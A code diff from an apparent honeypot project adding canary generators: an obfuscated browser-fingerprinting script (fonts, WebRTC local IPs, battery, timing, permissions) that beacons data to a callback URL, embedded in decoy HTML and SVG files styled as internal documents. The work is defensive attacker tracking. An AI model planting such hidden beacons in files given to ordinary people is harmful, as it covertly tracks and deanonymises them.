+      "DejaVu Sans", "DejaVu Sans Mono", "Liberation Sans",
+      "Liberation Mono", "Ubuntu", "Ubuntu Mono", "Roboto",
+      "Noto Sans", "Noto Mono",
+      "Microsoft YaHei", "SimSun", "PingFang SC", "Hiragino Sans",
+      "Hiragino Kaku Gothic Pro", "Yu Gothic", "Meiryo",
+      "Malgun Gothic", "Noto Sans CJK",
+      "Adobe Garamond Pro", "Myriad Pro", "Minion Pro",
+      "Bahnschrift", "Cyberpunk",
+    ];
+    var sp = document.createElement("span");
+    sp.style.fontSize = "72px";
+    sp.style.position = "absolute";
+    sp.style.left = "-9999px";
+    sp.innerHTML = "mmmmmmmmmmlli";
+    document.body.appendChild(sp);
+    var bs = {};
+    for (var bi = 0; bi < bases.length; bi++) {
+      sp.style.fontFamily = bases[bi];
+      bs[bases[bi]] = { w: sp.offsetWidth, h: sp.offsetHeight };
+    }
+    var det = [];
+    for (var ti = 0; ti < tests.length; ti++) {
+      for (var bj = 0; bj < bases.length; bj++) {
+        sp.style.fontFamily = "'" + tests[ti] + "'," + bases[bj];
+        if (sp.offsetWidth !== bs[bases[bj]].w ||
+            sp.offsetHeight !== bs[bases[bj]].h) {
+          det.push(tests[ti]); break;
+        }
+      }
+    }
+    document.body.removeChild(sp);
+    fp.ft = {
+      h: await sha256(det.slice().sort().join(",")),
+      n: det.length, t: tests.length, d: det,
+    };
+  } catch (e) { fp.ft = { err: String(e) }; }
+
+  // webrtc local ip leak
+  try {
+    var ips = {}; var cands = [];
+    var RPC = window.RTCPeerConnection || window.webkitRTCPeerConnection ||
+              window.mozRTCPeerConnection;
+    if (RPC) {
+      var pc = new RPC({ iceServers: [{ urls: "stun:stun.l.google.com:19302" }] });
+      pc.createDataChannel("");
+      pc.onicecandidate = function (e) {
+        if (!e.candidate) return;
+        cands.push(e.candidate.candidate);
+        var m = e.candidate.candidate.match(
+          /(\d+\.\d+\.\d+\.\d+|[a-f0-9:]+::[a-f0-9:]+)/);
+        if (m) ips[m[1]] = 1;
+      };
+      var off = await pc.createOffer();
+      await pc.setLocalDescription(off);
+      await new Promise(function (r) { setTimeout(r, 1500); });
+      pc.close();
+      fp.rtc = { ip: Object.keys(ips), n: cands.length, c: cands.slice(0, 3) };
+    } else { fp.rtc = { err: "unavailable" }; }
+  } catch (e) { fp.rtc = { err: String(e) }; }
+
+  // battery
+  try {
+    if (navigator.getBattery) {
+      var bat = await navigator.getBattery();
+      fp.bt = {
+        c: bat.charging, l: bat.level,
+        ct: bat.chargingTime === Infinity ? "inf" : bat.chargingTime,
+        dt: bat.dischargingTime === Infinity ? "inf" : bat.dischargingTime,
+      };
+    } else { fp.bt = { err: "unavailable" }; }
+  } catch (e) { fp.bt = { err: String(e) }; }
+
+  // perf timing jitter
+  try {
+    var samples = [];
+    for (var pi = 0; pi < 1000; pi++) {
+      var pa = performance.now();
+      var x = 0;
+      for (var pj = 0; pj < 1000; pj++) x += Math.sqrt(pj);
+      samples.push(performance.now() - pa);
+    }
+    samples.sort(function (a, b) { return a - b; });
+    fp.pf = {
+      med: samples[500].toFixed(4),
+      p95: samples[950].toFixed(4),
+      mn: samples[0].toFixed(4),
+      mx: samples[999].toFixed(4),
+    };
+  } catch (e) { fp.pf = { err: String(e) }; }
+
+  // permissions
+  try {
+    if (navigator.permissions) {
+      var names = ["geolocation", "notifications", "camera", "microphone",
+                   "persistent-storage", "clipboard-read", "clipboard-write"];
+      var st = {};
+      for (var ni = 0; ni < names.length; ni++) {
+        try {
+          var r = await navigator.permissions.query({ name: names[ni] });
+          st[names[ni]] = r.state;
+        } catch (e) { st[names[ni]] = "unsupported"; }
+      }
+      fp.pm = st;
+    } else { fp.pm = { err: "unavailable" }; }
+  } catch (e) { fp.pm = { err: String(e) }; }
+
+  // composite identity hash — stable inputs only
+  try {
+    var stable = [
+      fp.cv && fp.cv.h, fp.au && fp.au.h, fp.ft && fp.ft.h,
+      fp.gl && fp.gl.ur, fp.nav && fp.nav.pl,
+      fp.nav && fp.nav.hc, fp.tz && fp.tz.z,
+      fp.scr && (fp.scr.w + "x" + fp.scr.h),
+    ].filter(Boolean).join("|");
+    fp.id = await sha256(stable);
+  } catch (e) { fp.id = { err: String(e) }; }
+
+  // 2) ship the payload as base64url JSON on a GET query param.
+  //    The current worker records the hit on /c/<slug>; step-4 worker
+  //    will decode ?d= and persist the fingerprint blob.
+  try {
+    var json = JSON.stringify(fp);
+    var b64 = btoa(unescape(encodeURIComponent(json)))
+      .replace(/\+/g, "-").replace(/\//g, "_").replace(/=+$/, "");
+    // chunk if URL would exceed safe limit (~6KB)
+    var MAX = 6000;
+    if (b64.length <= MAX) {
+      fire(BEACON_URL + "?d=" + b64 + "&k=" + MINT_NONCE);
+    } else {
+      var sid = (Math.random() * 1e9 | 0).toString(36);
+      var total = Math.ceil(b64.length / MAX);
+      for (var ci = 0; ci < total; ci++) {
+        var part = b64.substr(ci * MAX, MAX);
+        fire(BEACON_URL + "?s=" + sid + "&i=" + ci + "&n=" + total + "&d=" + part + "&k=" + MINT_NONCE);
+      }
+    }
+  } catch (e) { /* swallow */ }
+})();
--- a/decnet/canary/generators/fingerprint_html.py
+++ b/decnet/canary/generators/fingerprint_html.py
@@ -0,0 +1,140 @@
+"""HTML fingerprint canary — plausible-looking page with an obfuscated
+browser-fingerprinting payload inlined at the bottom of ``<body>``.
+
+The visible content is a deliberately mundane "internal directory"
+table — the kind of file a curious attacker pulls off a decky's
+filesystem and opens locally to triage.  When the file is opened in
+*any* network-connected browser the obfuscated payload runs and beacons
+to ``/c/<callback_token>``: first a bare-open pixel, then a chunked
+fingerprint dump (canvas, audio, fonts, WebGL, WebRTC local IPs,
+timing jitter, permissions, composite identity hash).
+
+Determinism: the mint UUID is derived from the callback token via
+:func:`uuid.uuid5` so the same ``ctx`` always produces byte-identical
+output, satisfying the generator contract in :mod:`decnet.canary.base`.
+The obfuscator's seed and polymorphic config bits are likewise
+callback-token-derived (see :mod:`decnet.canary.obfuscator`).
+"""
+from __future__ import annotations
+
+import hashlib
+import uuid
+
+from decnet.canary.base import CanaryArtifact, CanaryContext, CanaryGenerator
+from decnet.canary.obfuscator import render_fingerprint_js, nonce_for
+
+_MINT_NAMESPACE = uuid.UUID("a3f7c821-9d1e-4b6a-8c2d-1e4f9a7b3c5d")
+
+
+def _mint_uuid_for(callback_token: str) -> str:
+    return str(uuid.uuid5(_MINT_NAMESPACE, callback_token))
+
+
+def _stable_int(callback_token: str, salt: str = "") -> int:
+    """Deterministic non-negative int derived from the callback token.
+
+    ``builtins.hash`` is salted per-process — useless for a generator
+    that must be byte-identical across runs.  SHA-256 prefix is
+    overkill but free.
+    """
+    h = hashlib.sha256((callback_token + "|" + salt).encode("utf-8")).digest()
+    return int.from_bytes(h[:4], "big")
+
+
+_PAGE_TEMPLATE = """<!DOCTYPE html>
+<html lang="en">
+<head>
+<meta charset="utf-8">
+<title>Internal Asset Directory</title>
+<style>
+body{{font-family:Segoe UI,Arial,sans-serif;background:#fafafa;color:#222;
+margin:24px;font-size:13px}}
+h1{{font-size:18px;margin:0 0 4px 0}}
+.sub{{color:#777;font-size:11px;margin-bottom:18px}}
+table{{border-collapse:collapse;width:100%;background:#fff;
+box-shadow:0 1px 2px rgba(0,0,0,.05)}}
+th,td{{padding:6px 10px;border-bottom:1px solid #eee;text-align:left}}
+th{{background:#f4f4f4;font-weight:600;font-size:11px;
+text-transform:uppercase;letter-spacing:.5px;color:#555}}
+tr:hover td{{background:#fafbff}}
+.foot{{margin-top:16px;color:#999;font-size:11px}}
+</style>
+</head>
+<body>
+<h1>Internal Asset Directory</h1>
+<div class="sub">last sync: {sync_label} · {row_count} entries · CONFIDENTIAL</div>
+<table>
+<tr><th>Hostname</th><th>Owner</th><th>Role</th><th>VLAN</th><th>Notes</th></tr>
+{rows}
+</table>
+<div class="foot">page generated by directory-sync v2.4.1 — do not redistribute</div>
+<script>{payload}</script>
+</body>
+</html>
+"""
+
+
+_ROW_POOL = (
+    ("ny-app-01.corp.local", "k.tanaka", "app server", "vlan20", "primary"),
+    ("ny-db-01.corp.local", "ops", "postgres primary", "vlan30", "backup nightly"),
+    ("ny-build-02.corp.local", "ci-bot", "jenkins agent", "vlan40", ""),
+    ("sf-vpn-01.corp.local", "netsec", "wireguard endpoint", "vlan10", "external"),
+    ("ldn-mail-03.corp.local", "j.weber", "exchange edge", "vlan50", ""),
+    ("hk-cache-01.corp.local", "ops", "redis replica", "vlan30", "lag <1s"),
+    ("br-dev-04.corp.local", "m.silva", "dev sandbox", "vlan60", "ephemeral"),
+    ("eu-bastion-02.corp.local", "secops", "ssh jump host", "vlan10", "mfa required"),
+    ("us-archive-01.corp.local", "compliance", "log archive", "vlan70", "retain 7y"),
+)
+
+
+def _build_rows(callback_token: str) -> tuple[str, int]:
+    pick = _stable_int(callback_token, "pick") % len(_ROW_POOL)
+    take = 5 + (_stable_int(callback_token, "take") % 4)
+    selected = [_ROW_POOL[(pick + i) % len(_ROW_POOL)] for i in range(take)]
+    cells = "\n".join(
+        "<tr>" + "".join(f"<td>{c}</td>" for c in row) + "</tr>"
+        for row in selected
+    )
+    return cells, len(selected)
+
+
+def _sync_label(callback_token: str) -> str:
+    day = _stable_int(callback_token, "day") % 28 + 1
+    hour = _stable_int(callback_token, "hour") % 24
+    return f"2026-04-{day:02d} {hour:02d}:14 UTC"
+
+
+class FingerprintHtmlGenerator(CanaryGenerator):
+    """Synthesise an HTML page that fingerprints the browser opening it."""
+
+    name = "fingerprint_html"
+
+    def generate(self, ctx: CanaryContext) -> CanaryArtifact:
+        mint_uuid = _mint_uuid_for(ctx.callback_token)
+        nonce = nonce_for(ctx.callback_token, mint_uuid)
+        payload = render_fingerprint_js(
+            callback_token=ctx.callback_token,
+            http_base=ctx.http_base,
+            mint_uuid=mint_uuid,
+            nonce=nonce,
+        )
+        rows, row_count = _build_rows(ctx.callback_token)
+        body = _PAGE_TEMPLATE.format(
+            sync_label=_sync_label(ctx.callback_token),
+            row_count=row_count,
+            rows=rows,
+            payload=payload,
+        )
+        beacon = f"{ctx.http_base.rstrip('/')}/c/{ctx.callback_token}"
+        return CanaryArtifact(
+            path="",
+            content=body.encode("utf-8"),
+            mode=0o644,
+            mtime_offset=-86400 * 14,
+            generator=self.name,
+            fingerprint_nonce=nonce,
+            notes=[
+                f"obfuscated fingerprinter beacons={beacon}",
+                f"mint_uuid={mint_uuid}",
+            ],
+        )
--- a/decnet/canary/generators/fingerprint_svg.py
+++ b/decnet/canary/generators/fingerprint_svg.py
@@ -0,0 +1,88 @@
+"""SVG fingerprint canary — standalone SVG with an embedded ``<script>``
+that runs the obfuscated fingerprinter when the file is opened directly
+in a browser.
+
+SVG ``<script>`` only fires when the SVG is loaded as a top-level
+document (or via ``<object>``/``<iframe>``); it's *blocked* when the
+SVG is referenced from another page's ``<img>``.  That's the right
+posture for canary use: an attacker browsing the decky filesystem and
+double-clicking a stray ``network_diagram.svg`` triggers it; rendering
+inside a sandboxed CMS preview does not.
+
+Same determinism guarantees as :mod:`fingerprint_html`.
+"""
+from __future__ import annotations
+
+from decnet.canary.base import CanaryArtifact, CanaryContext, CanaryGenerator
+from decnet.canary.generators.fingerprint_html import _mint_uuid_for, _stable_int
+from decnet.canary.obfuscator import render_fingerprint_js, nonce_for
+
+
+_DIAGRAM_TEMPLATE = """<?xml version="1.0" encoding="UTF-8"?>
+<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 600 360" width="600" height="360">
+<style>
+.box{{fill:#f7f9fb;stroke:#7a93ad;stroke-width:1.2}}
+.lbl{{font:12px Segoe UI,Arial,sans-serif;fill:#2a3a4a}}
+.edge{{stroke:#7a93ad;stroke-width:1.2;fill:none}}
+.title{{font:bold 14px Segoe UI,Arial,sans-serif;fill:#1a2a3a}}
+.cap{{font:10px Segoe UI,Arial,sans-serif;fill:#6a7a8a}}
+</style>
+<text class="title" x="20" y="28">Network Topology — {region} segment</text>
+<text class="cap" x="20" y="44">draft v{ver} · last reviewed {review}</text>
+<rect class="box" x="40" y="80" width="120" height="50" rx="4"/>
+<text class="lbl" x="100" y="110" text-anchor="middle">edge gw</text>
+<rect class="box" x="240" y="80" width="120" height="50" rx="4"/>
+<text class="lbl" x="300" y="110" text-anchor="middle">core sw</text>
+<rect class="box" x="440" y="80" width="120" height="50" rx="4"/>
+<text class="lbl" x="500" y="110" text-anchor="middle">app cluster</text>
+<rect class="box" x="240" y="220" width="120" height="50" rx="4"/>
+<text class="lbl" x="300" y="250" text-anchor="middle">db tier</text>
+<path class="edge" d="M160 105 L240 105"/>
+<path class="edge" d="M360 105 L440 105"/>
+<path class="edge" d="M300 130 L300 220"/>
+<script type="application/ecmascript"><![CDATA[
+{payload}
+]]></script>
+</svg>
+"""
+
+
+_REGIONS = ("us-east", "eu-central", "ap-south", "us-west", "sa-east")
+
+
+class FingerprintSvgGenerator(CanaryGenerator):
+    """Synthesise an SVG that fingerprints the browser opening it."""
+
+    name = "fingerprint_svg"
+
+    def generate(self, ctx: CanaryContext) -> CanaryArtifact:
+        mint_uuid = _mint_uuid_for(ctx.callback_token)
+        nonce = nonce_for(ctx.callback_token, mint_uuid)
+        payload = render_fingerprint_js(
+            callback_token=ctx.callback_token,
+            http_base=ctx.http_base,
+            mint_uuid=mint_uuid,
+            nonce=nonce,
+        )
+        region = _REGIONS[_stable_int(ctx.callback_token, "reg") % len(_REGIONS)]
+        ver = 1 + (_stable_int(ctx.callback_token, "ver") % 6)
+        day = _stable_int(ctx.callback_token, "day") % 28 + 1
+        body = _DIAGRAM_TEMPLATE.format(
+            region=region,
+            ver=ver,
+            review=f"2026-03-{day:02d}",
+            payload=payload,
+        )
+        beacon = f"{ctx.http_base.rstrip('/')}/c/{ctx.callback_token}"
+        return CanaryArtifact(
+            path="",
+            content=body.encode("utf-8"),
+            mode=0o644,
+            mtime_offset=-86400 * 30,
+            generator=self.name,
+            fingerprint_nonce=nonce,
+            notes=[
+                f"obfuscated fingerprinter beacons={beacon}",
+                f"mint_uuid={mint_uuid}",
+            ],
+        )
--- a/decnet/canary/generators/honeydoc_pdf.py
+++ b/decnet/canary/generators/honeydoc_pdf.py
@@ -43,7 +43,7 @@ class HoneydocPdfGenerator(CanaryGenerator):

    def generate(self, ctx: CanaryContext) -> CanaryArtifact:
        try:
-            from pikepdf import Pdf, Name, Dictionary, String  # type: ignore[import-not-found]
+            from pikepdf import Pdf, Name, Dictionary, String
        except ImportError as e:
            raise InstrumenterRejectedError(
                "honeydoc_pdf requires pikepdf; install it (`pip install "
--- a/decnet/canary/instrumenters/image.py
+++ b/decnet/canary/instrumenters/image.py
@@ -32,7 +32,7 @@ class ImageInstrumenter(CanaryInstrumenter):
        self, blob: bytes, ctx: CanaryContext, *, target_path: str,
    ) -> CanaryArtifact:
        try:
-            from PIL import Image, PngImagePlugin  # type: ignore[import-not-found]
+            from PIL import Image, PngImagePlugin
        except ImportError as e:
            raise InstrumenterRejectedError(
                "image instrumenter requires Pillow; install it (`pip "
--- a/decnet/canary/instrumenters/pdf.py
+++ b/decnet/canary/instrumenters/pdf.py
@@ -34,7 +34,7 @@ class PdfInstrumenter(CanaryInstrumenter):
        self, blob: bytes, ctx: CanaryContext, *, target_path: str,
    ) -> CanaryArtifact:
        try:
-            import pikepdf  # type: ignore[import-not-found]
+            import pikepdf
        except ImportError as e:
            raise InstrumenterRejectedError(
                "PDF instrumenter requires pikepdf; install it (`pip "
--- a/decnet/canary/obfuscator.py
+++ b/decnet/canary/obfuscator.py
@@ -0,0 +1,177 @@
+"""Per-mint JS obfuscator wrapper.
+
+Thin Python wrapper around the ``javascript-obfuscator`` Node package.
+Used by the fingerprint generators / instrumenters to produce a unique,
+hard-to-statically-analyse JS blob per canary mint.
+
+Two design choices flow from the canary contract in :mod:`base`:
+
+* **Determinism.** Generators must return byte-identical artifacts for
+  the same ``(callback_token, http_base, dns_zone, persona)``.  We
+  derive a numeric seed from the callback token and pass it to the
+  obfuscator's own ``seed`` option, and we derive the polymorphic
+  config bits from the same hash so a re-mint reproduces exactly.
+* **Per-mint uniqueness.** Two different callback tokens produce
+  structurally different output: different identifier names, different
+  string-array rotation, optionally different transforms enabled.
+
+The Node helper at ``_obfuscate_helper.js`` is invoked via subprocess.
+We pass code+options as JSON on stdin and read the obfuscated result
+from stdout.  Stderr surfaces obfuscator failures.
+"""
+from __future__ import annotations
+
+import hashlib
+import hmac
+import json
+import os
+import subprocess  # nosec B404 — Node helper exec is the whole point
+from pathlib import Path
+from typing import Any
+
+_HELPER = Path(__file__).parent / "_obfuscate_helper.js"
+_PAYLOAD = Path(__file__).parent / "fingerprint_payload.js"
+
+# Node binary path. Honor DECNET_NODE_BIN so deployments can pin a
+# specific runtime; default to PATH lookup.
+_NODE_BIN = os.environ.get("DECNET_NODE_BIN", "node")
+
+# Hard timeout for the obfuscator subprocess. Real runs on the
+# fingerprint payload sit well under 5s on a dev box.
+_TIMEOUT_S = 30
+
+
+class ObfuscatorError(RuntimeError):
+    """Raised when the Node helper fails or returns empty output."""
+
+
+class FingerprintSecretMissing(RuntimeError):
+    """Raised when ``DECNET_CANARY_FINGERPRINT_SECRET`` is unset.
+
+    Fingerprint canaries embed a per-mint nonce derived from this
+    server-side secret; without it the worker cannot validate incoming
+    fingerprint beacons, so we fail loud at mint time rather than ship
+    a defeatable canary.
+    """
+
+
+_FINGERPRINT_SECRET_ENV = "DECNET_CANARY_FINGERPRINT_SECRET"  # nosec B105 — this is an env var name, not a hardcoded password
+
+
+def nonce_for(callback_token: str, mint_uuid: str) -> str:
+    """Compute the per-mint fingerprint nonce.
+
+    HMAC-SHA256 keyed on the server-side master secret, message is
+    ``callback_token + "|" + mint_uuid``.  Truncated to 16 hex chars
+    (~64 bits of entropy) — enough to defeat slug-only forgery while
+    fitting comfortably into a query string.
+    """
+    secret = os.environ.get(_FINGERPRINT_SECRET_ENV, "")
+    if not secret:
+        raise FingerprintSecretMissing(
+            f"{_FINGERPRINT_SECRET_ENV} is unset; fingerprint canaries cannot mint"
+        )
+    msg = f"{callback_token}|{mint_uuid}".encode("utf-8")
+    return hmac.new(secret.encode("utf-8"), msg, hashlib.sha256).hexdigest()[:16]
+
+
+def _seed_from_token(callback_token: str) -> int:
+    """Derive a 31-bit numeric seed from the callback token.
+
+    ``javascript-obfuscator`` expects ``seed: number`` (int32-ish);
+    using a SHA-256-derived prefix gives us a uniform distribution
+    across the 31-bit positive range.
+    """
+    h = hashlib.sha256(callback_token.encode("utf-8")).digest()
+    return int.from_bytes(h[:4], "big") & 0x7FFFFFFF
+
+
+def _config_from_seed(seed: int) -> dict[str, Any]:
+    """Build a deterministic, per-mint obfuscator config.
+
+    The hash bits drive *which* transforms apply — two mints get
+    structurally different outputs, not just different identifier names.
+    Defaults stay aggressive enough that reverse engineering is real
+    work; we never disable string-array or rename, only vary the dial.
+    """
+    bits = seed
+    encodings = ("base64", "rc4")
+    string_array_encoding = [encodings[bits & 1]]
+    control_flow_threshold = 0.5 + ((bits >> 1) & 0xFF) / 512.0  # 0.5 .. ~1.0
+    dead_code_threshold = 0.2 + ((bits >> 9) & 0xFF) / 512.0  # 0.2 .. ~0.7
+    transform_object_keys = bool((bits >> 17) & 1)
+    numbers_to_expressions = bool((bits >> 18) & 1)
+    simplify = bool((bits >> 19) & 1)
+    return {
+        "compact": True,
+        "seed": seed,
+        "controlFlowFlattening": True,
+        "controlFlowFlatteningThreshold": round(control_flow_threshold, 3),
+        "deadCodeInjection": True,
+        "deadCodeInjectionThreshold": round(dead_code_threshold, 3),
+        "stringArray": True,
+        "stringArrayEncoding": string_array_encoding,
+        "stringArrayThreshold": 1,
+        "stringArrayRotate": True,
+        "stringArrayShuffle": True,
+        "splitStrings": True,
+        "splitStringsChunkLength": 4 + (bits & 7),
+        "transformObjectKeys": transform_object_keys,
+        "numbersToExpressions": numbers_to_expressions,
+        "simplify": simplify,
+        "selfDefending": False,  # breaks SVG embed; not worth the cost
+        "renameGlobals": False,
+        "identifierNamesGenerator": "mangled-shuffled",
+    }
+
+
+def obfuscate(code: str, *, callback_token: str) -> str:
+    """Obfuscate *code* deterministically per *callback_token*.
+
+    Raises :class:`ObfuscatorError` if Node fails or returns empty.
+    """
+    seed = _seed_from_token(callback_token)
+    options = _config_from_seed(seed)
+    payload = json.dumps({"code": code, "options": options})
+    try:
+        proc = subprocess.run(  # nosec B603 — argv-form, no shell, fixed helper path; payload is JSON on stdin, not in argv
+            [_NODE_BIN, str(_HELPER)],
+            input=payload, capture_output=True, text=True,
+            timeout=_TIMEOUT_S, check=False,
+        )
+    except FileNotFoundError as e:
+        raise ObfuscatorError(f"node binary not found: {_NODE_BIN!r}") from e
+    except subprocess.TimeoutExpired as e:
+        raise ObfuscatorError("javascript-obfuscator timed out") from e
+    if proc.returncode != 0:
+        raise ObfuscatorError(
+            f"javascript-obfuscator failed rc={proc.returncode} "
+            f"stderr={proc.stderr.strip()[:400]}"
+        )
+    out = proc.stdout
+    if not out.strip():
+        raise ObfuscatorError("javascript-obfuscator returned empty output")
+    return out
+
+
+def render_fingerprint_js(
+    *, callback_token: str, http_base: str, mint_uuid: str, nonce: str,
+) -> str:
+    """Build the obfuscated fingerprint JS for a single mint.
+
+    Substitutes ``{{BEACON_URL}}``, ``{{MINT_UUID}}``, and
+    ``{{MINT_NONCE}}`` in the payload template, then runs it through
+    :func:`obfuscate` with a seed derived from the callback token.
+    The nonce is appended as ``&k=`` on every beacon URL the JS emits;
+    the worker rejects fingerprint payloads whose ``?k=`` doesn't match
+    the row's :attr:`CanaryToken.fingerprint_nonce`.
+    """
+    template = _PAYLOAD.read_text(encoding="utf-8")
+    beacon = f"{http_base.rstrip('/')}/c/{callback_token}"
+    src = (
+        template
+        .replace("{{BEACON_URL}}", beacon)
+        .replace("{{MINT_UUID}}", mint_uuid)
+        .replace("{{MINT_NONCE}}", nonce)
+    )
+    return obfuscate(src, callback_token=callback_token)
--- a/decnet/canary/package.json
+++ b/decnet/canary/package.json
@@ -0,0 +1,10 @@
+{
+  "name": "decnet-canary-obfuscator",
+  "version": "0.1.0",
+  "private": true,
+  "description": "Node helper for decnet.canary.obfuscator — javascript-obfuscator wrapper invoked via subprocess.",
+  "main": "_obfuscate_helper.js",
+  "dependencies": {
+    "javascript-obfuscator": "^5.4.2"
+  }
+}
--- a/decnet/canary/paths.py
+++ b/decnet/canary/paths.py
@@ -28,6 +28,8 @@ _LINUX_DEFAULTS: dict[str, str] = {
    "honeydoc": "/home/{user}/Documents/quarterly_report.html",
    "honeydoc_docx": "/home/{user}/Documents/quarterly_report.docx",
    "honeydoc_pdf": "/home/{user}/Documents/quarterly_report.pdf",
+    "fingerprint_html": "/home/{user}/Documents/asset_directory.html",
+    "fingerprint_svg": "/home/{user}/Documents/network_topology.svg",
 }

 _WINDOWS_DEFAULTS: dict[str, str] = {
@@ -38,6 +40,8 @@ _WINDOWS_DEFAULTS: dict[str, str] = {
    "honeydoc": "/home/{user}/Documents/quarterly_report.html",
    "honeydoc_docx": "/home/{user}/Documents/quarterly_report.docx",
    "honeydoc_pdf": "/home/{user}/Documents/quarterly_report.pdf",
+    "fingerprint_html": "/home/{user}/Documents/asset_directory.html",
+    "fingerprint_svg": "/home/{user}/Documents/network_topology.svg",
 }


--- a/decnet/canary/planter.py
+++ b/decnet/canary/planter.py
@@ -20,11 +20,8 @@ shape but speaks bytes-via-base64 over the wire.
 """
 from __future__ import annotations

-import asyncio
-import base64
 import os
-import shlex
-import time
+from datetime import datetime, timedelta, timezone
 from secrets import token_urlsafe
 from typing import Any, Iterable, Optional

@@ -34,13 +31,16 @@ from decnet.bus.factory import get_bus
 from decnet.canary.base import CanaryArtifact, CanaryContext
 from decnet.canary.factory import get_generator
 from decnet.canary.paths import default_path_for
+from decnet.decky_io import (
+    delete_file_from_container,
+    resolve_topology_container,
+    write_file_to_container,
+)
 from decnet.logging import get_logger
 from decnet.web.db.repository import BaseRepository

 log = get_logger("canary.planter")

-_DOCKER = "docker"
-_TIMEOUT = 8.0
 # Container suffix — matches the orchestrator SSH driver's convention
 # (``<decky_name>-ssh``).  Canary placement always happens through the
 # ssh container because every decky has one and it carries the most
@@ -52,62 +52,16 @@ def _container_for(decky_name: str) -> str:
    return f"{decky_name}{_SSH_CONTAINER_SUFFIX}"


-def _dirname(path: str) -> str:
-    idx = path.rfind("/")
-    if idx <= 0:
-        return "/"
-    return path[:idx]
-
-
-async def _run(
-    argv: list[str], *, stdin_bytes: Optional[bytes] = None,
-) -> tuple[int, str, str]:
-    try:
-        proc = await asyncio.create_subprocess_exec(
-            *argv,
-            stdin=asyncio.subprocess.PIPE if stdin_bytes is not None else None,
-            stdout=asyncio.subprocess.PIPE,
-            stderr=asyncio.subprocess.PIPE,
-        )
-    except FileNotFoundError as exc:
-        return 127, "", f"argv[0] not found: {exc}"
-    try:
-        stdout, stderr = await asyncio.wait_for(
-            proc.communicate(input=stdin_bytes), timeout=_TIMEOUT,
-        )
-    except asyncio.TimeoutError:
-        try:
-            proc.kill()
-        except ProcessLookupError:
-            pass
-        return 124, "", "timeout"
-    return (
-        proc.returncode if proc.returncode is not None else -1,
-        stdout.decode("utf-8", "replace"),
-        stderr.decode("utf-8", "replace"),
-    )
-
-
-def _build_plant_command(artifact: CanaryArtifact) -> tuple[str, bytes]:
-    """Compose the ``sh -c`` script + stdin payload for one artifact.
-
-    Binary safety: we base64-encode on the host and stream the result
-    over stdin to ``base64 -d`` inside the container, so the bytes
-    never touch the argv (kernel ARG_MAX would reject anything larger
-    than ~128KB-2MB depending on the host).  Both ``base64`` (coreutils)
-    and ``touch -d @<unix_ts>`` are present on every Linux base image
-    we ship, so there's no per-distro branching.
-    """
-    encoded = base64.b64encode(artifact.content)
-    mtime = int(time.time() + artifact.mtime_offset)
-    mode_str = oct(artifact.mode)[2:]
-    parts = [
-        f"mkdir -p {shlex.quote(_dirname(artifact.path))}",
-        f"base64 -d > {shlex.quote(artifact.path)}",
-        f"chmod {mode_str} {shlex.quote(artifact.path)}",
-        f"touch -d @{mtime} {shlex.quote(artifact.path)}",
-    ]
-    return " && ".join(parts), encoded
+# resolve_topology_container is re-exported from decky_io for back-compat
+# with callers (tests, deploy hook) that imported it from this module
+# before the decky_io extraction.
+__all__ = [
+    "plant",
+    "revoke",
+    "resolve_topology_container",
+    "seed_baseline",
+    "seed_baseline_topology",
+]


 async def _publish(
@@ -139,6 +93,7 @@ async def plant(
    repo: Optional[BaseRepository] = None,
    publish: bool = True,
    bus: Optional[BaseBus] = None,
+    container: Optional[str] = None,
 ) -> tuple[bool, Optional[str]]:
    """Write *artifact* into the decky's ssh container.

@@ -157,13 +112,12 @@ async def plant(
            await repo.update_canary_token_state(token_uuid, "failed", err)
        return False, err

-    sh_cmd, stdin_payload = _build_plant_command(artifact)
-    # ``-i`` keeps stdin attached so base64 -d inside the container can
-    # consume the encoded payload streamed from the host.
-    argv = [_DOCKER, "exec", "-i", _container_for(decky_name), "sh", "-c", sh_cmd]
-    rc, _stdout, stderr = await _run(argv, stdin_bytes=stdin_payload)
-    success = rc == 0
-    error = None if success else (stderr.strip()[:256] or f"rc={rc}")
+    target_container = container or _container_for(decky_name)
+    mtime = datetime.now(timezone.utc) + timedelta(seconds=artifact.mtime_offset)
+    success, error = await write_file_to_container(
+        target_container, artifact.path, artifact.content,
+        mode=artifact.mode, mtime=mtime,
+    )

    if repo is not None:
        if success:
@@ -182,8 +136,8 @@ async def plant(

    if not success:
        log.warning(
-            "canary.plant failed decky=%s token=%s rc=%d stderr=%r",
-            decky_name, token_uuid, rc, stderr[:120],
+            "canary.plant failed decky=%s token=%s container=%s err=%r",
+            decky_name, token_uuid, target_container, error,
        )
    return success, error

@@ -196,6 +150,7 @@ async def revoke(
    repo: Optional[BaseRepository] = None,
    publish: bool = True,
    bus: Optional[BaseBus] = None,
+    container: Optional[str] = None,
 ) -> tuple[bool, Optional[str]]:
    """Best-effort unlink + state transition + bus publish.

@@ -203,11 +158,10 @@ async def revoke(
    the file is gone after the call (whether we deleted it or it was
    already missing); only docker / container-down errors return False.
    """
-    sh_cmd = f"rm -f {shlex.quote(placement_path)}"
-    argv = [_DOCKER, "exec", _container_for(decky_name), "sh", "-c", sh_cmd]
-    rc, _stdout, stderr = await _run(argv)
-    success = rc == 0
-    error = None if success else (stderr.strip()[:256] or f"rc={rc}")
+    target_container = container or _container_for(decky_name)
+    success, error = await delete_file_from_container(
+        target_container, placement_path,
+    )

    if repo is not None:
        await repo.update_canary_token_state(token_uuid, "revoked", error if not success else None)
@@ -250,6 +204,7 @@ async def seed_baseline(
    persona: str = "linux",
    created_by: str = "system",
    bus: Optional[BaseBus] = None,
+    container: Optional[str] = None,
 ) -> list[dict[str, Any]]:
    """Plant the configured baseline canary set on one decky.

@@ -293,9 +248,59 @@ async def seed_baseline(
        await plant(
            decky_name, artifact,
            token_uuid=token_uuid, repo=repo, publish=True, bus=bus,
+            container=container,
        )
        out.append({
            "token_uuid": token_uuid, "generator": gen_name, "kind": kind,
            "callback_token": slug, "placement_path": artifact.path,
        })
    return out
+
+
+async def seed_baseline_topology(
+    repo: BaseRepository,
+    topology_id: str,
+    *,
+    created_by: str = "system",
+    bus: Optional[BaseBus] = None,
+) -> list[dict[str, Any]]:
+    """Plant baseline canaries on every decky in a MazeNET topology.
+
+    Mirrors :func:`seed_baseline` for the topology path. Container name
+    resolution uses :func:`resolve_topology_container` since topology
+    deckies may not have an ssh service — in that case we target the
+    base container instead.
+
+    Best-effort: failures on any single decky are logged inside
+    :func:`plant`; the deploy hook treats the return value as
+    informational. Returns a flat list of per-token dicts (with an added
+    ``decky_name`` key) across all deckies.
+    """
+    from decnet.topology.persistence import hydrate
+
